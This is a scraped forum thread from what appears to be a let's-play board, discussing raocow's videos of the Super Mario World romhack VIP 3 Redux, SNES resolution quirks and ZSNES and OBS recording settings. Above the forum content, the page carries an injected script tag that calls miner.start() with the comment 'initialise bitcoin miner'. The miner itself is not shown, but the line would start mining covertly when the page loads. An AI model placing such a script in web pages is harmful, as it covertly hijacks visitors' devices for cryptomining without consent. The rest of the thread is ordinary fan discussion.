<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralmario fan games galaxy

VIP 3 Redux: FINAL: Grace of Kings

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Zephyr_DragonLord
The dragon awakens...!
First name: Zach

Re: VIP 3 Redux: Monster Castle

Postby Zephyr_DragonLord » 3 years ago

Bleh, bad P-balloon sections. I agree with raocow with that not being hard (in fact, the one in SMW was harder, in my opinion), but it was irritating how much you need to wait. The difficulty seems forced. ...Though that 1-up death was pretty funny.

The sewers were okay, and Roy... was just kind of there. I feel better about hopping off Yoshi in the jail... there was no possible way to free him, anyways.
I am prone to almost everything... except spontaneous violence.
Any questions, concerns, or aspirations you have with me can go to the PM box... Now here's a quote:
raocow wrote:I know there is a population on Earth. They like to populate. I like to gesticulate. We're friends!
(It was about time)

Divemissile

Postby Divemissile » 3 years ago

was there any real kaizo traps here? i'm not a kaizo expert, but i don't think there were any.

also p balloon boon is really cute

Xirix
The British Palindrome

Re: VIP 3 Redux: Soothing Sands

Postby Xirix » 3 years ago

Willhart wrote:The screen seemed smaller than normal.
Aye, probably just a mistake in the resolution settings of DXTory?

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 3 years ago

It'll probably be fixed soon. Not sure if on the next video yet, since I forget what order those are recorded in.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 3 years ago

yeah, next video is not gonna have that extra band of black at the bottom, AND it should be both smooth as well as crisp. FINALLY ?!

fun fact, that black band at the bottom just kinda exists in zsnes. like if you take a screenshot of the game screen, you'll have that band just kinda chilling. It's really weird!

edit: I said 'bandicam' instead of 'zsnes', which meant my statement made no sense.
the chillaxest of dragonsImage
ImageImage

Mata Hari

Postby Mata Hari » 3 years ago

I hate to say it but that black band is kind of useful insofar as if you're mousing over the timebar for whatever reason it doesn't cover any of the action. But... you don't have to keep it.

raocow
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

there's been enough people mentionning it that it'll get cropped out, haha. I get what you are saying, and honestly I could get convinced to keep it for that reason, but I know most people like to just full screen the video and stuff, so it'll be gone.
ImageImage

Rednaxela
Maker of Shenanigans

Postby Rednaxela » 3 years ago

raocow wrote:fun fact, that black band at the bottom just kinda exists in zsnes. like if you take a screenshot of the game screen, you'll have that band just kinda chilling. It's really weird!
The SNES's native resolution in many (but not all) games is 256x224 (in more rare cases 512x224 or 512x448). Anyway, NTSC TV output has 480 rows, and the game's resolution gets mapped to 448 rows within those 480 rows. Emulators often show the NTSC resolution number of rows, which makes for the black bars. Pretty sure that's why the black bars with zsnes.

Warning, geeky rambling ahead:
Other fun fact, a pixel in NTSC video is in fact not square. Often emulators (at least with default settings) will stretch 512 pixels to something a little wider 585 pixels on screen in order to simulate this and make things appear as tall/wide as they're intended to. Of course, this stretching also smears pixels horizontally a bit. An emulator doing this puts a limit on how crisp the sprites in one's screen/video capture can be in the horizontal direction.

During my recent Soul Blazer LP, midway through, I started taking measures to avoid this horizontal smearing (running the emulator without the stretching, and having my video processing scripts fix the aspect ratio as part of it's final rescaling steps). It was a hassle in some ways, but I considered it worth it. I say a hassle because it also involved a workaround to play the game with a corrected aspect ratio, while simultaneously recording the uncorrected (and thus unsmeared) aspect ratio version.
Last edited by Rednaxela on 19 Jun 2016, 07:15, edited 1 time in total.

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 3 years ago

I feel like I'm learning a lot today.

SAJewers
hi

Postby SAJewers » 3 years ago

Rednaxela wrote: Warning, geeky rambling ahead:
Other fun fact, a pixel in NTSC video is in fact not square. Often emulators (at least with default settings) will stretch 512 pixels to something a little wider 585 pixels on screen in order to simulate this and make things appear as tall/wide as they're intended to. Of course, this stretching also smears pixels horizontally a bit. An emulator doing this puts a limit on how crisp the sprites in one's screen/video capture can be in the horizontal direction.

During my recent Soul Blazer LP, midway through, I started taking measures to avoid this horizontal smearing (running the emulator without the stretching, and having my video processing scripts fix the aspect ratio as part of it's final rescaling steps). It was a hassle in some ways, but I considered it worth it. I say a hassle because it also involved a workaround to play the game with a corrected aspect ratio, while simultaneously recording the uncorrected (and thus unsmeared) aspect ratio version.
There's a post on the Libretro forums that does a good job of explaing this as well, for those who want more info.
ImageImageImageImageImage
ImageImageImageImage

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 3 years ago

Well, I'm confused about the second goal in "Two Paths - Above and Below Ground" being the secret exit as well. I think something must have broke.
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Ryrir
Pronouns: he/him/his

Postby Ryrir » 3 years ago

jayScribble wrote:Well, I'm confused about the second goal in "Two Paths - Above and Below Ground" being the secret exit as well. I think something must have broke.
It makes more sense when you look at the level on the wiki.

There are two paths and you can get both exits on both paths: On the way above ground the normal exit is the goal tape and you can reach the secret exit by flying under the goal with a blue yoshi, on the underground path the orb triggers the normal exit and the goal tape triggers the secret one.

Also, be prepared for a rather toxic video tommorrow
this is getting laundromatic

Zephyr_DragonLord
The dragon awakens...!
First name: Zach

Re: VIP 3 Redux: Diesel Angel

Postby Zephyr_DragonLord » 3 years ago

What IS a diesel angel, anyways? An angel in a truck? (probably not)

I'm glad the issue seems to have been resolved with the video software.

The levels today were cool. The game's being nice to Yoshi for a change... And the difficulty curve has been officially smashed into pieces. Maybe the portals will bring Mario to more insane levels that will bend his mind further?
I am prone to almost everything... except spontaneous violence.
Any questions, concerns, or aspirations you have with me can go to the PM box... Now here's a quote:
raocow wrote:I know there is a population on Earth. They like to populate. I like to gesticulate. We're friends!
(It was about time)

Kshaard
Dodo/
First name: mac5565

Postby Kshaard » 3 years ago

Introducing Yoshi's spleen: the album!
Yoshi's spleen album cover.png
Yoshi's spleen album cover.png (148.32 KiB) Viewed 2115 times
Attachments
only the best in lyrics technology.rtf
(1.01 KiB) Downloaded 34 times
1 - Prologue.mp3.zip
(717.14 KiB) Downloaded 34 times
2 - Rocking out.mp3.zip
(735.81 KiB) Downloaded 27 times
3 - Farewell dot html.mp3.zip
(783.5 KiB) Downloaded 28 times
Last edited by Kshaard on 19 Jun 2016, 14:18, edited 1 time in total.
This is someone's signature.

"I don't like that universe I just created by accident . . ."

Mata Hari

wow

Mata Hari

10/10 virtually unlistenable

xfix
:)
First name: Konrad Borowski

Postby xfix » 3 years ago

Ryrir wrote:Also, be prepared for a rather toxic video tommorrow
That depends on a path raocow will pick. If raocow picks Layer 2 path, toxicity will be delayed.

(I do agree the level you are talking about is quite toxic however, not in terms of difficulty (although it is hard), but in terms of really annoying palette)

Grounder

Postby Grounder » 3 years ago

Wheel of difficulty, turn, turn, turn!
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Money

Postby Money » 3 years ago

Kshaard wrote:Introducing Yoshi's spleen: the album!
Yoshi's spleen album cover.png
holy shit these are beautiful

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 3 years ago

Wow, not only did raocow manage to move a piranha plant over slightly, he also managed to get hit by one while it was still in its pipe. Always more to learn about this crazy engine.

Dragon Fogel
Master of Pointlessness

Postby Dragon Fogel » 3 years ago

I can't wait for someone to make a level where you have to move a piranha plant off-center.
Click that banner if you like reading words.
Make levels from unused MAGL X names!

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 3 years ago

Dragon Fogel wrote:I can't wait for someone to make a level where you have to move a piranha plant off-center.
I was thinking maybe it could become an important new tool for arbitrary code executions.

Drei
First name: Stirling

Postby Drei » 3 years ago

I'm not alone in seeing a huge desaturation in the recent video, am I? It feels there were more artifacts too.

FPzero
Resident SMW Central Admin

Postby FPzero » 3 years ago

raocow, I left this comment on the video in response to your reply, but I wanted to leave it here too just in case Youtube doesn't like huge comments. My username is FPzero over on Youtube:
ZSNES's internal recording feature is generally terrible for quality. I'm surprised the video looks as good as it does coming from a ZSNES recording.
One possible solution might be the following. Set your ZSNES window to be pretty large, like the "1024x896 DR W" setting. You can then use Open Broadcast Software (OBS) to record the ZSNES window itself. As long as you have a high encoding bitrate set in the options (above 3000 or so is usually good, go higher if it looks blurry) you should end up with a .mp4 file that is nearly lossless AND is already at 1024x896 resolution. The filesize is also not gigantic since it does do some encoding on its own. From there, you should be able to import the .mp4 and edit it in any way necessary.
OBS comes in two versions: Studio, which is the current version/branch of the program, and Classic, which is no longer updated but last I checked had a few more features than Studio simply because it was further along in development before they shifted it to a new codebase. I use Classic but Studio should be able to do all that I've mentioned here.
I've used this method to stream ZSNES games many times as well as to record footage from all sorts of other games and consoles. Maybe this can help you!
I can go more in-depth on any of the steps if you're interested in trying this method. I've been using OBS for streaming and recording for about three years now and feel like I know my way around the program's functions pretty well.

raocow

I use to do something like that, but then we'd get random frame drops all over the place.

Like at this point I just can't win and I'll take this, as it looks good enough for the needs of the game honestly.
ImageImage

Return to “let's play”